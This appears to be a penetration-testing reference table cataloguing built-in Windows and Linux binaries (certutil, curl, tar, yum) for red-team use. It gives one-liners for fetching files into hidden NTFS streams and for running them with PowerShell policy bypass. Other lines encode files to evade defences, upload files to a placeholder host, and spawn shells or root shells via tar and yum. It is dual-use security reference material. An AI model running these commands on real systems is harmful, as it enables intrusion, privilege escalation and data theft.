The goal of the CHDB project is to document every binary, script, and library that can be helpful for penetration testing (Red Team).
id | OS | Command | Privileges | Function | Protocol | Type | Notes |
---|---|---|---|---|---|---|---|
1 | Windows | certutil.exe | User | Download, ADS, Encode, Decode | HTTP, HTTPS | binary | Download: `certutil.exe -urlcache -split -f http://example.com/file_name file_name`<br>Download a file and save it in an NTFS Alternate Data Stream (ADS): `certutil.exe -urlcache -split -f http://example.com/file_name.ps1 c:\temp:file_name`<br>Test: `powershell -ep bypass - < c:\temp:file_name`<br>Find: `dir /s /r \| find ":$DATA"`<br>Encode (Base64) files to evade defensive measures: `certutil -encode InputFileName EncodedOutputFileName`<br>Decode (Base64) file: `certutil -decode File_Encoded File_Decoded`<br>Description: certutil - dump and display certification authority (CA) configuration information, configure Certificate Services, back up and restore CA components, and verify certificates, key pairs, and certificate chains.<br>Path: `C:\Windows\System32\certutil.exe`, `C:\Windows\SysWOW64\certutil.exe`<br>Protocol: HTTP, HTTPS<br>OS-Version: 7, 8, 10 |
2 | Windows | curl | User | Download, Upload | HTTP, HTTPS, FILE, FTP, FTPS, SCP, SFTP, SMB, SMBS, TFTP, IMAP, IMAPS, LDAP, LDAPS, POP3, POP3S, RTMP, RTSP, SMTP, SMTPS, TELNET, GOPHER | binary | Download: `curl http://example.com/file_name -o file_name`<br>Upload: `curl -F 'file=@file_to_send' http://example.com/upload/`<br>Description: curl - a tool to transfer data from or to a server.<br>Path: `C:\Windows\System32\curl.exe`<br>Protocol: HTTP, HTTPS, FILE, FTP, FTPS, SCP, SFTP, SMB, SMBS, TFTP, IMAP, IMAPS, LDAP, LDAPS, POP3, POP3S, RTMP, RTSP, SMTP, SMTPS, TELNET, GOPHER<br>OS-Version: 10 |
3 | Linux | curl | User | Download, Upload | HTTP, HTTPS, FILE, FTP, FTPS, SCP, SFTP, SMB, SMBS, TFTP, IMAP, IMAPS, LDAP, LDAPS, POP3, POP3S, RTMP, RTSP, SMTP, SMTPS, TELNET, GOPHER | binary | Download: `curl http://example.com/file_name -o file_name`<br>Upload: `curl -F 'file=@file_to_send' http://example.com/upload/`<br>Description: curl - a tool to transfer data from or to a server.<br>Path: `/usr/bin/curl`, `/usr/local/bin/curl`<br>Protocol: HTTP, HTTPS, FILE, FTP, FTPS, SCP, SFTP, SMB, SMBS, TFTP, IMAP, IMAPS, LDAP, LDAPS, POP3, POP3S, RTMP, RTSP, SMTP, SMTPS, TELNET, GOPHER<br>OS-Version: - |
4 | Linux | tar | User, Sudo | Shell, Download, Upload, Read, Write, Sudo | SSH | binary | Shell: break out from restricted environments: `tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh` or `tar xf /dev/null -I '/bin/sh -c "sh <&2 1>&2"'` (GNU tar only)<br>Download: download and extract a tar archive via SSH (GNU tar only). `RHOST=example.com`<br>Upload: create a tar archive and send it via SSH to a remote location (GNU tar only). `RHOST=example.com`<br>* The rmt utility is required on the attacker box for download or upload (rmt provides remote access to files and devices for tar).<br>Read: it reads data from files, so it may be used to do privileged reads or disclose files outside a restricted file system (GNU tar only). `LFILE=file_to_read`<br>Write: it writes data to files, so it may be used to do privileged writes or write files outside a restricted file system (GNU tar only). `LFILE=file_to_write`<br>Sudo: if the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access. `sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh`<br>Description: tar - an archiving utility<br>Path: `/bin/tar`, `/usr/local/bin/tar`<br>Protocol: SSH<br>OS-Version: - |
5 | Linux | yum | User, Sudo | Shell, Download, Sudo | HTTP, HTTPS | binary | Download: `yum install http://example.com/file_to_get.rpm`<br>Sudo: spawn an interactive root shell by loading a custom plugin. `TF=$(mktemp -d)`, `cat >$TF/y.conf<<EOF`, `cat >$TF/y.py<<EOF`, `sudo yum -c $TF/x --enableplugin=y`<br>Description: yum - Yellowdog Updater Modified<br>Path: `/usr/bin/yum`<br>Protocol: HTTP, HTTPS<br>OS-Version: - |
Windows
- Microsoft-signed (native to the OS or downloaded from Microsoft).
- Executing code (Arbitrary code, Pass-through execution of other programs (unsigned) or scripts)
- File operations (Download, Upload, Copy, Encode, Decode, …)
- User Account Control (UAC) Bypass
- Credential theft
- Log Evasion & Obfuscation
- DLL Sideloading and Hijacking
- Dumping process memory
- Compiling code
Linux
- Break Out (restricted shells)
- Reverse Shells
- Privilege Escalation (SUID, SGID, Sticky Bits)
- File operations (Download, Upload, Copy, Encode, Decode, …)
- Facilitate the other post-exploitation tasks
- Log Evasion & Obfuscation
- Dumping process memory
- Compiling code
Disclaimer
Use this only for research purposes and ethical hacking; do not break any laws by exploiting the weaknesses of companies!